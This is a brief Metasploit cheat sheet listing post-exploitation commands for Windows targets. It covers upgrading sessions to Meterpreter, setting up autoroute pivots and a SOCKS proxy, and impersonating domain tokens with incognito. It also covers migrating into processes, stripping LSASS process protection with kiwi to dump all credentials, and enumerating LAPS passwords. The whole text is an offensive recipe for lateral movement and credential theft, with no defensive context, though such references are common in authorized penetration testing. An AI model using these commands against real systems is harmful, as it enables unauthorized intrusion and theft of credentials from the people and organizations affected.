 % metasploit

# upgrade session to meterpreter
sessions -u <session_id> 

# show session list
sessions -l 

# print route table
route print 

# add pivot (autoroute)
example : 
use multi/manage/autoroute
set session 1
exploit 
use multi/manage/autoroute 

# add socks proxy (autoroute first)

example : 
use multi/manage/autoroute
set session 1
exploit
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
exploit -j 
use auxiliary/server/socks_proxy 

# load incognito 
load incognito 

# incognito impersonate token
impersonate_token <domain>\\<user> 
# create process
execute -H -f <process|notepad> 

# migrate with name
migrate -N <process_name|notepad.exe> 

#  PPL remove
load kiwi
kiwi_cmd "!processprotect /process:lsass.exe /remove"
creds_all 

# enum LAPS
use post/windows/gather/credentials/enum_laps 

